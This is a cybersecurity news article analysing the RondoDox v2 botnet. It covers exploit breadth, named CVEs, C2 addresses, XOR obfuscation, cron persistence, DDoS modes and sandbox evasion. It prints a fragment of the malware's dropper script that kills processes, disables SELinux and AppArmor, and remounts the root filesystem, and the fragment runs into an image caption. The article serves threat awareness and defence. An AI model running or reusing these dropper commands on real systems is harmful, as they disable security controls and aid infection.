A sophisticated evolution of the RondoDox botnet has emerged with a staggering 650% increase in exploitation capabilities, marking a significant escalation in the threat landscape for both enterprise and IoT infrastructure.
First documented by FortiGuard Labs in September 2024, the original RondoDox variant focused narrowly on DVR systems with just two exploit vectors.
The newly discovered RondoDox v2, however, demonstrates a dramatic expansion with over 75 distinct exploitation vectors targeting everything from legacy routers to modern enterprise applications.
This evolution represents a fundamental shift in botnet development strategy, bridging the gap between opportunistic IoT exploitation and targeted enterprise compromise.
The malware was detected on October 30, 2025, through honeypot telemetry when research infrastructure began receiving automated exploitation attempts from IP address 124.198.131.83 originating from New Zealand.
The attack pattern immediately distinguished itself through its volume and sophistication, deploying 75 distinct exploit payloads in rapid succession.
Each payload attempted command injection vectors targeting router and IoT vulnerabilities, with all payloads downloading malicious scripts from the command-and-control server at 74.194.191.52.
Unusually, the threat actor embedded an open attribution signature—[email protected]—directly into User-Agent strings, marking a departure from the anonymous operational security typically employed by botnet operators.
Beelzebub analysts identified the malware through their AI-native deception platform, which captured the complete attack chain and enabled comprehensive technical analysis of the botnet’s capabilities.
RondoDox v2 targets an extensive range of vulnerable devices spanning multiple vendor ecosystems and spanning over a decade of CVE history.
The exploit arsenal includes critical vulnerabilities such as CVE-2014-6271 (Shellshock), CVE-2018-10561 (Dasan GPON routers), CVE-2021-41773 (Apache HTTP Server), and CVE-2024-3721 (TBK DVR systems).
The malware demonstrates cross-platform flexibility by deploying 16 architecture-specific binaries including x86_64, multiple ARM variants, MIPS, PowerPC, and even legacy architectures like m68k and SPARC.
This comprehensive architecture support ensures maximum infection potential across diverse embedded systems and enterprise servers.
The command-and-control infrastructure operates on compromised residential IP addresses distributed across multiple ASNs, providing resilience and evasion capabilities that make traditional blocking strategies less effective.
Technical Infrastructure and Obfuscation Mechanisms
The dropper script employed by RondoDox v2 showcases sophisticated evasion and persistence techniques designed to bypass security controls and eliminate competing malware.
Upon execution, the script immediately disables SELinux and AppArmor security frameworks using commands such as setenforce 0 and service apparmor stop, creating an environment conducive to malicious activity.
The script then proceeds with aggressive competitor elimination, systematically killing processes associated with cryptocurrency miners like xmrig and other known botnet families including redtail.
This behavior ensures resource monopolization on infected systems while reducing detection probability by eliminating noisy competing malware.
The binary payload itself employs XOR-based string obfuscation with a key value of 0x21 to conceal critical configuration data from static analysis tools.
Decoded strings reveal command-and-control protocol implementations including “handshake” for C2 initialization and “udpraw” indicating DDoS capabilities.
The malware demonstrates anti-analysis awareness by checking for exit code 137, which indicates SIGKILL termination commonly employed by automated sandbox environments.
Detection of this condition causes immediate script termination, effectively evading many automated malware analysis systems.
#!/bin/sh
# [email protected]
exec > /dev/null 2>&1
[ -t 0 ] && exit 0
for p in /proc/[0-9]*; do pid=${p##*/}; [ ! -e "$p/exe" ] && kill -9 $pid 2>/dev/null; done
setenforce 0
service apparmor stop
mount -o remount,rw /||sudo mount -o remount,rw /.webp "RondoDox Botnet Updated Their Arsenal with 650% More Exploits Targeting Enterprises 3")
Persistence mechanisms leverage cron-based scheduling with @reboot directives, ensuring automatic execution following system restarts.
The malware attempts installation across multiple filesystem locations including /tmp/lib/rondo, /dev/shm/lib/rondo, and /var/tmp/lib/rondo, demonstrating awareness of different system configurations and permission structures.
Network communication occurs over TCP port 345 using a custom binary protocol that initiates with a “handshake” message to the primary C2 server at 74.194.191.52.
The malware spoofs User-Agent strings to appear as legitimate iPhone iOS 18.5 devices, further obscuring malicious traffic within enterprise environments.
DDoS capabilities include HTTP flood attacks mimicking gaming traffic, UDP raw socket operations, TCP SYN flooding, and protocol mimicry for OpenVPN, WireGuard, and popular gaming platforms including Minecraft, Fortnite, and Discord.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
